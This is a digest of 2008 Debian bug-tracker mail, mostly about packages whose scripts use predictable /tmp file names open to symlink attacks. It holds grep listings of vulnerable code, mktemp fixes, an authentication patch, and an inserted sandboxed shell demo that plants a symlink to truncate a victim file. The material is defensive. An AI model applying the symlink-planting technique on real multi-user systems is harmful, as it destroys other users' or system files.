493883: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=493883
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

---BeginMessage---
Package: manpages-it
Version: 0.3.4-5
Severity: serious

manpages-it is not installable because it tries to overwrite file /usr/share/man/it/man1/hman.1.gz, also provided by package man2html. I don't know whether this issue must be solved by manpages-it or man2html.

Setting the severity as serious because I can't install the package.

Thank you, Giovanni.

# LANG=C apt-get install manpages-it
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
  manpages-it
1 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 0B/499kB of archives.
After this operation, 914kB disk space will be freed.
(Reading database ... 343588 files and directories currently installed.)
Preparing to replace manpages-it 0.3.4-5 (using .../manpages-it_2.80-1_all.deb) ...
Unpacking replacement manpages-it ...
dpkg: error processing /var/cache/apt/archives/manpages-it_2.80-1_all.deb (--unpack):
 trying to overwrite `/usr/share/man/it/man1/hman.1.gz', which is also in package man2html
dpkg-deb: subprocess paste killed by signal (Broken pipe)
Processing triggers for man-db ...
Errors were encountered while processing:
 /var/cache/apt/archives/manpages-it_2.80-1_all.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)

--- System information. ---
Architecture: i386
Kernel: Linux 2.6.25-2-686

Debian Release: lenny/sid
  500 unstable www.debian-multimedia.org
  500 unstable ftp.it.debian.org
  500 testing security.debian.org
  500 testing ftp.it.debian.org
  500 stable security.debian.org
  500 stable ftp.it.debian.org

--
Giovanni Mascellani [EMAIL PROTECTED]
Pisa, Italy
Web: http://giomasce.altervista.org
SIP: [EMAIL PROTECTED]
Jabber: [EMAIL PROTECTED] / [EMAIL PROTECTED]
GPG: 0x5F1FBF70 (FP: 1EB6 3D43 E201 4DDF 67BD 003F FCB0 BB5C 5F1F BF70)
---End Message---
---BeginMessage---
Source: man-pages-it
Source-Version: 2.80-3

We believe that the bug you reported is fixed in the latest version of man-pages-it, which is due to be installed in the Debian FTP archive:

man-pages-it_2.80-3.diff.gz to pool/main/m/man-pages-it/man-pages-it_2.80-3.diff.gz
man-pages-it_2.80-3.dsc to pool/main/m/man-pages-it/man-pages-it_2.80-3.dsc
manpages-it_2.80-3_all.deb to pool/main/m/man-pages-it/manpages-it_2.80-3_all.deb

A summary of the changes between this version and the previous one is attached.

Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Francesco Paolo Lovergine [EMAIL PROTECTED] (supplier of updated man-pages-it package)

(This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED])

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Wed, 27 Aug 2008 12:56:34 +0200
Source: man-pages-it
Binary: manpages-it
Architecture: source all
Version: 2.80-3
Distribution: unstable
Urgency: low
Maintainer: Francesco Paolo Lovergine [EMAIL PROTECTED]
Changed-By: Francesco Paolo Lovergine [EMAIL PROTECTED]
Description:
 manpages-it - Italian version of the manual pages
Closes: 493883
Changes:
 man-pages-it (2.80-3) unstable; urgency=low
 .
   * Removed duplicated man2html.1 (closes: #493883)
Bug#471404: Wouldn't a 32bit bin86 be usefull?
Hi,

wouldn't it make sense to compile bin86 with -m32 on amd64? People might still want to build 16bit code for example for a boot loader.

Kind regards
Goswin
Bug#332782: Release Notes: license clarification
On Tue, Aug 26, 2008 at 09:58:25PM +0200, Josip Rodin wrote:
On Tue, Aug 26, 2008 at 07:26:38PM +0200, Luk Claes wrote:

But, in such an (unlikely) court battle the onus would be on them to prove that the stuff they committed was both copyrightable in the first place as well as not infringing on previous work (which they apparently didn't have any license to modify).

Nope, without a license the contributor could ask for compensation per copy that was distributed if the court would agree that he has copyright on it and we didn't have permission to distribute it (which is not far fetched at all without having a license...).

As I said above... they could hardly claim copyright on modifications which they made without a license. Also, there is no direct damage made to the contributor too. Compensation is for something they have fair claim.
Processed: newsbeuter installability
Processing commands for [EMAIL PROTECTED]:

# libmrss0 is not installable; can be fixed by rebuild from source
severity 496774 serious
Bug#496774: libmrss0: depends on a nonexistent package
Severity set to `serious' from `normal'

# newsbeuter has been built against the problematic libmrss0
severity 496772 serious
Bug#496772: newsbeuter: depends on a nonexistent package
Severity set to `serious' from `normal'

block 496772 by 496774
Bug#496774: libmrss0: depends on a nonexistent package
Bug#496772: newsbeuter: depends on a nonexistent package
Was not blocked by any bugs.
Blocking bugs of 496772 added: 496774

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496363: The possibility of attack with the help of symlinks in some Debian packages
Hi Dirk,

On Monday 25 August 2008 13:57, Dirk Eddelbuettel wrote:
> Upstream covers more than just Linux distros: Aix, Solaris, OS X, HP-UX,
> ... and even Windoze (though the javareconf script may not matter there).
>
> But I just emailed the point person for javareconf. Maybe we can move
> creation of the temp.dir into a helper function which uses mktemp if present
> and default to what it currently does.
>
> New version with patched javareconf now uploaded.

I see an upload of r-base-core but not (yet) of r-base-core-ra, is that intentional?

cheers,
Thijs
Processed: confirmed, let's remove it instead
Processing commands for [EMAIL PROTECTED]:

tags 496437 confirmed
Bug#496437: The possibility of attack with the help of symlinks in some Debian packages
Tags were: security
Tags added: confirmed

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496437: confirmed, let's remove it instead
tags 496437 confirmed
thanks

I confirmed that the package is full of insecure temp files. However given that it's orphaned and has several problems, I'm asking for removal from unstable.

Thijs
Bug#496357: opensync-plugin-palm: Impossible to install the package
On Sun, Aug 24, 2008 at 08:04:44PM +0200, nb wrote:
> When I try to install the package, I have the following error :
>
> Package: opensync-plugin-palm
> [...]

Sorry, but that's no error, that's the apt-cache output. Can you please post the error you get?

thanks,
Michael
Bug#496363: The possibility of attack with the help of symlinks in some Debian packages
Hi Thijs,

On 27 August 2008 at 13:57, Thijs Kinkhorst wrote:
| Hi Dirk,
|
| On Monday 25 August 2008 13:57, Dirk Eddelbuettel wrote:
| Upstream covers more than just Linux distros: Aix, Solaris, OS X, HP-UX,
| ... and even Windoze (though the javareconf script may not matter there).
|
| But I just emailed the point person for javareconf. Maybe we can move
| creation of the temp.dir into a helper function which uses mktemp if present
| and default to what it currently does.
|
| New version with patched javareconf now uploaded.
|
| I see an upload of r-base-core but not (yet) of r-base-core-ra, is that
| intentional?

It was. R 2.7.2 came out on Monday, so r-base-core was a natural candidate. Yesterday I worked on the RC bug requiring GSL docs to go to non-free for dfsg / gfdl reasons.

So for r-base-core-ra, a build will follow shortly. There will be a new release too (corresponding to R 2.7.2), but as we don't know when I'll just preempt it with a new build with a patched javareconf.

Hth, Dirk

--
Three out of two people have difficulties with fractions.
Processed: confirmed to be present
Processing commands for [EMAIL PROTECTED]:

tags 496427 confirmed
Bug#496427: The possibility of attack with the help of symlinks in some Debian packages
Tags were: security
Tags added: confirmed

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496427: confirmed to be present
tags 496427 confirmed
thanks

Indeed present, a simple grep yields a number of different results already, see below. As the code contains many instances of different things written to /tmp, it may make sense to resolve that by creating one private working dir securely, and then prefixing that path to all uses of /tmp.

Thijs

./lmbench-3.0-a7/src/bench.h:97:#define UNIX_CONTROL /tmp/lmbench.ctl
./lmbench-3.0-a7/src/bench.h:98:#define UNIX_DATA /tmp/lmbench.data
./lmbench-3.0-a7/src/bench.h:99:#define UNIX_LAT /tmp/lmbench.lat
./lmbench-3.0-a7/src/rhttp.c:81: sprintf(name, /tmp/rhttp%d, i);
./lmbench-3.0-a7/src/rhttp.c:96:system(cat /tmp/rhttp*; rm /tmp/rhttp*);
./lmbench-3.0-a7/src/rhttp.c:106: sprintf(buf, /tmp/http%d, i);
./lmbench-3.0-a7/src/lat_fcntl.c:105: sprintf(state-filename1, /tmp/lmbench-fcntl%d.1, getpid());
./lmbench-3.0-a7/src/lat_fcntl.c:106: sprintf(state-filename2, /tmp/lmbench-fcntl%d.2, getpid());
./lmbench-3.0-a7/src/lat_unix_connect.c:18:#define CONNAME /tmp/af_unix
./lmbench-3.0-a7/src/lat_fifo.c:15:#define F1 /tmp/lmbench_f1.%d
./lmbench-3.0-a7/src/lat_fifo.c:16:#define F2 /tmp/lmbench_f2.%d
./lmbench-3.0-a7/src/lat_proc.c:20:#define PROG /tmp/hello-s
./lmbench-3.0-a7/src/lat_proc.c:23:#define PROG /tmp/hello
./lmbench-3.0-a7/src/lmhttp.c:23:#define LOGFILE /usr/tmp/lmhttp.log
./lmbench-3.0-a7/scripts/SHIT:594: system co -q -p -kkvl $rev $_[$i] /tmp/sdiff.$$ .
./lmbench-3.0-a7/scripts/SHIT:595: $diff /tmp/sdiff.$$ $working[$i];
./lmbench-3.0-a7/scripts/SHIT:597: unlink(/tmp/sdiff. $$);
./lmbench-3.0-a7/scripts/rccs:603: system co -q -p -kkvl $rev $_[$i] /tmp/sdiff.$$ .
./lmbench-3.0-a7/scripts/rccs:604: $diff /tmp/sdiff.$$ $working[$i];
./lmbench-3.0-a7/scripts/rccs:606: unlink(/tmp/sdiff. $$);
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
Hello Dmitry,

Thanks for your test, but atm I've some problems to fix this issue for lustre-tests

> In some packages I've discovered scripts with errors which may be used
> by a user for damaging important system files or user's files.
> For example if a script uses in its work a temp file which is created
> in /tmp directory, then every user can create symlink with the same
> name in this directory in order to destroy or rewrite some system
> or user file. Symlink attack may also lead not only to the data
> destruction but to denial of service as well.

Btw: lustre-tests is a package which contains only binaries for debugging lustre, and is therefore only needed on very very few systems. But nevertheless this should be fixed.

I guess the part which is critical is this one:

---snip--
while date; do
    LOOP=`expr $LOOP + 1`
    echo Test #$LOOP
    iozone $VERIFY $ODIR -r $REC -i 0 -i 1 -f $FILE -s $SIZE 2>&1 || exit $?
    [ -f endiozone -o $LOOP -ge $COUNT ] && rm -f endiozone && exit 0
done | tee /tmp/iozone.log
snap

This small script creates a log of the iozone run in /tmp without checking if this file exists there.

Do you have any hints how to fix this issue?

Greetings
Winnie
Bug#496433: this is indeed present
tags 496433 confirmed
thanks

Hi,

Indeed, several times the file /tmp/audiolink.db.tmp gets used in code/audiolink. This is probably easily fixable through using the Perl::Temp module and its mktemp() function to create a secure file once, (re)use that on the several needed occasions and remove it after.

cheers,
Thijs
Bug#481134: Please hint poppler-data for lenny inclusion
On Sun, 24 Aug 2008 08:32:21 +0200 Christian Perrier [EMAIL PROTECTED] wrote:
> Also don't forget about suggesting to add it to the CJK languages
> -desktop tasks in tasksel, if it is that important. I think that
> non-free packages can be added there...

That's very very helpful for our users!

If not, users must edit their apt lines by hand, and know this poppler-data package is needed to view PDF files, it's a painful thing for average users (Yes, I can do that easily, and you can also do that, but your mother, father, little brother or sister probably can't do that).

Our priorities are our users and free software - yeah, you know that, users are important for us :) (not only free software)

So I and other Japanese Debian developer/maintainer/package maintainer/users want poppler-data package to there, the CJK languages-desktop tasks in tasksel. Please consider that.

--
Regards,
Hideki Yamane henrich @ debian.or.jp/iijmio-mail.jp
http://wiki.debian.org/HidekiYamane
Processed: this is indeed present
Processing commands for [EMAIL PROTECTED]:

tags 496433 confirmed
Bug#496433: The possibility of attack with the help of symlinks in some Debian packages
Tags were: security
Tags added: confirmed

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496419: issue is present, code runs as root
tags 496419 confirmed
thanks

Hi,

A simple grep revealed a lot of tempfile issues here, see below. As far as I understand it, the code runs as root. This makes the issue quite serious. Please make sure this is fixed before lenny is released.

As several different temp files are used insecurely, it may be better to create a separate, private working directory for the program where it may store all those files at will.

cheers,
Thijs

./config-scripts/xen-3.2/configure-xend.sh:cat EOF /tmp/open_ssl.res
./config-scripts/xen-3.2/configure-xend.sh:$OPENSSL req -new -key $KEY -out $CSR /tmp/open_ssl.res
./config-scripts/xen-3.2/configure-xend.sh:rm /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:cat EOF /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:$OPENSSL req -new -key $KEY -out $CSR /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:rm /tmp/open_ssl.res
./src/utils.py:updates_file = /tmp/updates.xml
./src/utils.py: dir=/tmp)
./src/utils.py:TEST_CONFIGFILE = '/tmp/convirt.conf'
./src/XenNode.py:dom_config.save(/tmp/test_config)
./src/XenNode.py:newcfg.set_filename(/tmp/Txx)
./src/XenNode.py:f = managed_node.node_proxy.open(/tmp/Txx)
./src/XenNode.py:print ### read config from /etc/xen/auto and write them to /tmp
./src/XenNode.py:d.save(/tmp/ + f)
./src/NodeProxy.py:node.put(/tmp/send, /tmp/send_r)
./src/NodeProxy.py:node.get(/tmp/send_r, /tmp/received)
./src/NodeProxy.py:fd = node.open('/tmp/test_writable','w')
./src/NodeProxy.py: print 'exists?: ',node.file_exists('/tmp/test_writable')
./src/NodeProxy.py:print 'isWritable?: ', node.file_is_writable('/tmp/test_writable')
./src/NodeProxy.py:node.remove('/tmp/test_writable')
./src/NodeProxy.py:print 'exists?: ', node.file_exists('/tmp/test_writable')
./src/NodeProxy.py:node.mkdir(/tmp/node_test)
./src/NodeProxy.py:w = node.open(/tmp/node_test/test, w)
./src/NodeProxy.py:r = node.open(/tmp/node_test/test)
./src/NodeProxy.py:node.remove(/tmp/node_test/test)
./src/NodeProxy.py:node.rmdir(/tmp/node_test)
./src/NodeProxy.py:output,code = node.exec_cmd('find /tmp')
./src/NodeProxy.py:output,code = node.exec_cmd('junk /tmp')
./src/GridManager.py: dir=/tmp)
./src/KVMProxy.py:cmdline = cmdline + -monitor unix:/tmp/ + config.get(name) + \
./src/KVMProxy.py:config[monitor] = unix:/tmp/xyz
Processed: issue is present, code runs as root
Processing commands for [EMAIL PROTECTED]:

tags 496419 confirmed
Bug#496419: The possibility of attack with the help of symlinks in some Debian packages
Tags were: security
Tags added: confirmed

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#481134: Please hint poppler-data for lenny inclusion
On Sun, 24 Aug 2008 19:45:13 +0200 Luk Claes [EMAIL PROTECTED] wrote:
> unblocked

Great thanks Luk!

But, verrry sooorry, I've updated this poppler-data package before reading this mail... changelog is below, 1 bug fix and trivial changes.

poppler-data (0.2.0-2) unstable; urgency=low

  * debian/control
    - add DM-Upload-Allowed: yes, because I'm DM :)
    - fix poppler-data should suggest libpoppler3 (Closes: #496268)
    - change Priority: optional from extra, same as cmap-adobe-*
    - add some descriptions for cmap-adobe-* users

so, please unblock this again, please... I am terribly sorry about the inconvenience.

--
Regards,
Hideki Yamane henrich @ debian.or.jp/iijmio-mail.jp
http://wiki.debian.org/HidekiYamane
Bug#496582: gnome-app-install: Application hangs while searching for a package
reassign 496582 librsvg2-2 2.22.2-2
severity 496582 important

On Wednesday, 27.08.2008, at 00:13 +0200, Jose Pablo Ferrero wrote:
> The problem occurs when showing some icons (i.e. elisa.svg). Trying to
> open elisa.svg (/usr/share/app-install/icons/) with gpaint or gimp cause
> a segmentation fault, but with epiphany, iceweasel or svgdisplay there
> isn't any problem. I'm not sure where the problem could be, but because
> this is not a gnome-install-app bug, please close it.

This seems to be a bug in librsvg. Many applications crash with this file, including eog and rsvg-view.
Processed (with 5 errors): Re: Bug#496582: gnome-app-install: Application hangs while searching for a package
Processing commands for [EMAIL PROTECTED]:

reassign 496582 librsvg2-2 2.22.2-2
Bug#496582: gnome-app-install: Application hangs while searching for a package
Bug reassigned from package `gnome-app-install' to `librsvg2-2'.

severity 496582 important
Bug#496582: gnome-app-install: Application hangs while searching for a package
Severity set to `important' from `grave'

Am Mittwoch, den 27.08.2008, 00:13 +0200 schrieb Jose Pablo Ferrero:
Unknown command or malformed arguments to command.

The problem occurs when showing some icons (i.e. elisa.svg). Trying to
Unknown command or malformed arguments to command.

open elisa.svg (/usr/share/app-install/icons/) with gpaint or gimp cause
Unknown command or malformed arguments to command.

a segmentation fault, but with epiphany, iceweasel or svgdisplay there
Unknown command or malformed arguments to command.

isn't any problem. I'm not sure where the problem could be, but because
Unknown command or malformed arguments to command.

Too many unknown commands, stopping here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Processed: retitle 494468 to Postinst violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen
Processing commands for [EMAIL PROTECTED]:

# Automatically generated email from bts, devscripts version 2.10.33
retitle 494468 Postinst violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen
Bug#494468: locales: Postist violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen
Changed Bug title to `Postinst violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen' from `locales: Postist violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen'.

End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
This one time, at band camp, Patrick Winnertz said:
> I guess the part which is critical is this one:

tmpfile=$(mktemp /tmp/iozone.XX)
---snip--
while date; do
    LOOP=`expr $LOOP + 1`
    echo Test #$LOOP
    iozone $VERIFY $ODIR -r $REC -i 0 -i 1 -f $FILE -s $SIZE 2>&1 || exit $?
    [ -f endiozone -o $LOOP -ge $COUNT ] && rm -f endiozone && exit 0
snap
done | tee $tmpfile

--
Stephen Gran [EMAIL PROTECTED]
Debian user, admin, and developer
http://www.debian.org
Bug#496363: marked as done (The possibility of attack with the help of symlinks in some Debian packages)
Your message dated Wed, 27 Aug 2008 13:02:13 + with message-id [EMAIL PROTECTED]
and subject line Bug#496363: fixed in r-base-core-ra 1.1.1-2
has caused the Debian Bug report #496363,
regarding The possibility of attack with the help of symlinks in some Debian packages
to be marked as done.

This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.)

--
496363: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496363
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

---BeginMessage---
Package: r-base-core-ra
Severity: grave

Hi, maintainer!

This message about the error concerns a few packages at once. I've tested all the packages (for Lenny) on my Debian mirror. All scripts of packages (marked as executable) were tested.

In some packages I've discovered scripts with errors which may be used by a user for damaging important system files or user's files.

For example if a script uses in its work a temp file which is created in /tmp directory, then every user can create symlink with the same name in this directory in order to destroy or rewrite some system or user file. Symlink attack may also lead not only to the data destruction but to denial of service as well.

Even if you create files or directories with help of function 'RANDOM' or pid(), then your system is not protected. Attacker can create many symlinks in order to destroy your data or create 'denial of service' for your package scripts.

Even if you make rm(dir) for files/directories, then your system is not protected. Attacker can permanently create symlinks.

This list is created with the help of script. This list is sorted by hand. However in some cases mistake is possible. Please, be understanding to possible mistakes. :)

I set Severity into grave for this bug. The table of discovered problems is below.

Discussion of this bug you can see in debian-devel@:
http://lists.debian.org/debian-devel/2008/08/msg00271.html

Binary-package: r-base-core-ra (1.1.1-1)
    file: /usr/lib/Ra/lib/R/bin/javareconf
Binary-package: rccp (0.9-2)
    file: /usr/lib/rccp/delqueueask
Binary-package: mafft (6.240-1)
    file: /usr/bin/mafft-homologs
Binary-package: openoffice.org-common (1:2.4.1-6)
    file: /usr/lib/openoffice/program/senddoc
Binary-package: crossfire-maps (1.11.0-1)
    file: /usr/share/games/crossfire/maps/Info/combine.pl
Binary-package: sgml2x (1.0.0-11.1)
    file: /usr/bin/rlatex
Binary-package: liguidsoap (0.3.6-4)
    file: /var/lib/liguidsoap/liguidsoap.py
Binary-package: citadel-server (7.37-1)
    file: /usr/lib/citadel-server/migrate_aliases.sh
Binary-package: ampache (3.4.1-1)
    file: /usr/share/ampache/www/locale/base/gather-messages.sh
Binary-package: xen-utils-3.2-1 (3.2.1-2)
    file: /usr/lib/xen-3.2-1/bin/qemu-dm.debug
Binary-package: dtc-common (0.29.6-1)
    file: /usr/share/dtc/admin/accesslog.php
    file: /usr/share/dtc/admin/sa-wrapper
Binary-package: honeyd-common (1.5c-3)
    file: /usr/share/honeyd/scripts/test.sh
Binary-package: lustre-tests (1.6.5-1)
    file: /usr/lib/lustre/tests/runiozone
Binary-package: linuxtrade (3.65-8+b4)
    file: /usr/share/linuxtrade/bin/linuxtrade.bwkvol
    file: /usr/share/linuxtrade/bin/linuxtrade.wn
    file: /usr/share/linuxtrade/bin/moneyam.helper
Binary-package: freevo (1.8.1-0)
    file: /usr/bin/freevo.real
Binary-package: fml (4.0.3.dfsg-2)
    file: /usr/share/fml/libexec/mead.pl
Binary-package: rkhunter (1.3.2-3)
    file: /usr/bin/rkhunter
Binary-package: openswan (1:2.4.12+dfsg-1.1)
    file: /usr/lib/ipsec/livetest
Binary-package: linux-patch-openswan (1:2.4.12+dfsg-1.1)
    file: /usr/src/kernel-patches/all/openswan/packaging/utils/maysnap
    file: /usr/src/kernel-patches/all/openswan/packaging/utils/maytest
Binary-package: aptoncd (0.1-1.1)
    file: /usr/share/aptoncd/xmlfile.py
Binary-package: cdcontrol (1.90-1.1)
    file: /usr/lib/cdcontrol/writtercontrol
Binary-package: newsgate (1.6-23)
    file: /usr/bin/mkmailpost
Binary-package: gpsdrive-scripts (2.10~pre4-3)
    file: /usr/bin/geo-code
Binary-package: impose+ (0.2-11)
    file: /usr/bin/impose
Binary-package: mgt (2.31-5)
    file: /usr/games/mailgo
Binary-package: audiolink (0.05-1)
    file: /usr/bin/audiolink
Binary-package: ibackup (2.27-4.1)
    file: /usr/bin/ibackup
Binary-package: emacspeak (26.0-3)
    file: /usr/share/emacs/site-lisp/emacspeak/etc/extract-table.pl
Binary-package: bk2site (1:1.1.9-3.1)
    file: /usr/lib/cgi-bin/bk2site/redirect.pl
Binary-package: datafreedom-perl (0.1.7-1)
    file: /usr/bin/dfxml-invoice
Binary-package: emacs-jabber (0.7.91-1)
    file:
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
SG> tmpfile=$(mktemp /tmp/iozone.XX)

use 'mktemp -t iozone.XX' instead of 'mktemp /tmp/iozone.XX'

--
... mpd paused: Manowar - Gloves of Metal
Dmitry E. Oboukhov [EMAIL PROTECTED]
GPGKey: 1024D / F8E26537 2006-11-21
1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
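Added example, not part of the thread and not code from lustre-tests or any other package named here: the fixed-name log file from the runiozone snippet next to the private working directory suggested in the replies to #496427 and #496419, run entirely inside a throwaway sandbox. The function names, the sandbox layout and the sample data are constructed for illustration.

```shell
#!/bin/sh
# Added illustration; all names below are hypothetical and the "victim" file
# is constructed sample data that lives only inside a sandbox directory.

# Create a private working directory and print its path.
# mktemp -d picks an unpredictable name, creates the directory with mode 0700
# and fails instead of reusing an existing entry, so a link planted in advance
# is never followed. GNU mktemp needs at least three trailing X characters in
# the template; ten are used here.
make_workdir() {
    prefix=$1
    base=${2:-${TMPDIR:-/tmp}}
    mktemp -d "$base/$prefix.XXXXXXXXXX"
}

# Build a sandbox standing in for a shared /tmp: one file that must not be
# touched, plus a symlink to it planted at the predictable log name.
# Prints the sandbox path.
make_sandbox() {
    sandbox=$(make_workdir symlink-demo) || return 1
    mkdir "$sandbox/shared-tmp"
    printf 'important data\n' > "$sandbox/victim.conf"
    ln -s "$sandbox/victim.conf" "$sandbox/shared-tmp/iozone.log"
    printf '%s\n' "$sandbox"
}

# Pattern from the report: "... | tee /tmp/iozone.log" with a fixed name.
# tee opens the path for writing, follows the planted link and truncates the
# file behind it. Prints what the victim file contains afterwards.
demo_insecure() {
    sandbox=$(make_sandbox) || return 1
    printf 'Test #1\n' | tee "$sandbox/shared-tmp/iozone.log" >/dev/null
    cat "$sandbox/victim.conf"
    rm -rf "$sandbox"
}

# Hardened pattern: create one private directory first, then put every
# temporary file (here the log) underneath it. The planted link sits at a
# name the script never opens. Prints what the victim file contains afterwards.
demo_secure() {
    sandbox=$(make_sandbox) || return 1
    work=$(make_workdir iozone "$sandbox/shared-tmp") || return 1
    printf 'Test #1\n' | tee "$work/iozone.log" >/dev/null
    cat "$sandbox/victim.conf"
    rm -rf "$sandbox"
}

echo "fixed name:  victim file now contains:   $(demo_insecure)"
echo "private dir: victim file still contains: $(demo_secure)"
```

In a real script the working directory would be removed from a `trap ... EXIT` handler so that it is cleaned up on every exit path.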
Processed: your mail
Processing commands for [EMAIL PROTECTED]:

forwarded 496414 http://bugzilla.scilab.org/show_bug.cgi?id=3409
Bug#496414: The possibility of attack with the help of symlinks in some Debian packages
Noted your statement that Bug has been forwarded to http://bugzilla.scilab.org/show_bug.cgi?id=3409.

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#483337: intent to NMU
Hi, a patch to fix this is attached and archived on: http://people.debian.org/~nion/nmu-diff/mt-daapd-0.9~r1696-1.3_0.9~r1696-1.4.patch Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. diff -u mt-daapd-0.9~r1696/debian/changelog mt-daapd-0.9~r1696/debian/changelog --- mt-daapd-0.9~r1696/debian/changelog +++ mt-daapd-0.9~r1696/debian/changelog @@ -1,3 +1,11 @@ +mt-daapd (0.9~r1696-1.4) unstable; urgency=low + + * Fix authentication upstream patch checking for a wrong return value +(03_fix-authentication.dpatch; Closes: #496217). + * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337) + + -- Nico Golde [EMAIL PROTECTED] Wed, 27 Aug 2008 14:53:45 +0200 + mt-daapd (0.9~r1696-1.3) unstable; urgency=high * Non-maintainer upload by the Security Team. diff -u mt-daapd-0.9~r1696/debian/patches/00list mt-daapd-0.9~r1696/debian/patches/00list --- mt-daapd-0.9~r1696/debian/patches/00list +++ mt-daapd-0.9~r1696/debian/patches/00list @@ -2,0 +3,2 @@ +03_fix-authentication +04_taglib_api_calls only in patch2: unchanged: --- mt-daapd-0.9~r1696.orig/debian/patches/04_taglib_api_calls.dpatch +++ mt-daapd-0.9~r1696/debian/patches/04_taglib_api_calls.dpatch 
@@ -0,0 +1,47 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 04_taglib_api_calls.dpatch by Nico Golde [EMAIL PROTECTED] +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: No description. + [EMAIL PROTECTED]@ +diff -urNad mt-daapd-0.9~r1696~/src/scan-mpc.c mt-daapd-0.9~r1696/src/scan-mpc.c +--- mt-daapd-0.9~r1696~/src/scan-mpc.c 2007-08-10 06:07:26.0 +0200 mt-daapd-0.9~r1696/src/scan-mpc.c 2008-08-27 14:53:27.0 +0200 +@@ -70,31 +70,31 @@ + len = strlen(val); + if ((pmp3-title = calloc(len + 1, 1)) != NULL) + strncpy(pmp3-title, val, len); +-taglib_tag_free_strings(val); ++taglib_tag_free_strings(); + } + if ((val = taglib_tag_artist(tag)) != NULL) { + len = strlen(val); + if ((pmp3-artist = calloc(len + 1, 1)) != NULL) + strncpy(pmp3-artist, val, len); +-taglib_tag_free_strings(val); ++taglib_tag_free_strings(); + } + if ((val = taglib_tag_album(tag)) != NULL) { + len = strlen(val); + if ((pmp3-album = calloc(len + 1, 1)) != NULL) + strncpy(pmp3-album, val, len); +-taglib_tag_free_strings(val); ++taglib_tag_free_strings(); + } + if ((val = taglib_tag_comment(tag)) != NULL) { + len = strlen(val); + if ((pmp3-comment = calloc(len + 1, 1)) != NULL) + strncpy(pmp3-comment, val, len); +-taglib_tag_free_strings(val); ++taglib_tag_free_strings(); + } + if ((val = taglib_tag_genre(tag)) != NULL) { + len = strlen(val); + if ((pmp3-genre = calloc(len + 1, 1)) != NULL) + strncpy(pmp3-genre, val, len); +-taglib_tag_free_strings(val); ++taglib_tag_free_strings(); + } + + if ((i = taglib_tag_year(tag)) != 0) only in patch2: unchanged: --- mt-daapd-0.9~r1696.orig/debian/patches/03_fix-authentication.dpatch +++ mt-daapd-0.9~r1696/debian/patches/03_fix-authentication.dpatch 
@@ -0,0 +1,19 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 03_fix-authentication.dpatch by Nico Golde [EMAIL PROTECTED] +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: No description. + [EMAIL PROTECTED]@ +diff -urNad mt-daapd-0.9~r1696~/src/webserver.c mt-daapd-0.9~r1696/src/webserver.c +--- mt-daapd-0.9~r1696~/src/webserver.c 2007-10-22 05:40:29.0 +0200 mt-daapd-0.9~r1696/src/webserver.c 2008-08-27 14:49:35.0 +0200 +@@ -1131,7 +1131,7 @@ + if((auth_handler) (auth_handler(pwsc,NULL,NULL)==0)) { + /* do the auth thing */ + auth=ws_getarg(pwsc-request_headers,Authorization); +-if((auth) (ws_decodepassword(auth,username, password))) { ++if((auth) (0 == ws_decodepassword(auth,username, password))) { + if(auth_handler(pwsc,username,password)) + can_dispatch=1; + ws_addarg(pwsc-request_vars,HTTP_USER,%s,username); pgpah3i2XxugH.pgp Description: PGP signature
